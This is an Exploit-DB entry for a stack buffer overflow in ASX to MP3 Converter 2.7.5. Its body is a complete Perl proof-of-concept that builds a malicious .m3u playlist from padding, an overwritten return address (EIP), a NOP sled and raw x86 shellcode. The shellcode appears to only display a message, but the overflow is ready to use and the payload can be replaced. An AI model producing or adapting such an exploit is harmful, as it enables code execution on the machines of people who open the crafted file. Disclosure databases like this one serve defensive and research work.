Asx to Mp3 2.7.5 - Local Stack Overflow

EDB-ID:

34921




Platform:

Windows

Date:

2014-10-07


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

###########################################################################################
# Exploit Title: ASX to MP3 Converter 2.7.5 stack buffer overflow
# Date: 6 Oct 2014
# Exploit Author: Amir Reza Tavakolian
# Vendor Homepage: http://binarylife.blog.ir/
# Software Link: http://download.cnet.com/ASX-to-MP3-Converter/3000-2168_4-10385919.html
# Version: 2.7.5
# Tested on: windows xp sp 3
#
#
# Special thanks to Mr Michael Czumak (T_v3rn1x) for his tutorial in securitysift.com. 
# Thanks Mike. :)
##########################################################################################





#!/usr/bin/perl

my $junk = "\x41" x 35056;
my $eip = pack ('V', 0x73e848a7);



my $nop = "\x90" x 4;

my $shellcode = "\x90" x 25;
$shellcode = $shellcode . "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" .
           "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" .
           "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" .
            "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" .
           "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" .
           "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" .
            "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" .
           "\x49\x0b\x31\xc0\x51\x50\xff\xd7";

my $junk1 = "c" x 24806;




my $total = $junk.$eip.$nop.$shellcode.$junk1;
my $file = "poc1.m3u";


open (FILE, ">$file");
print FILE $total;
close (FILE);
print "Done.../";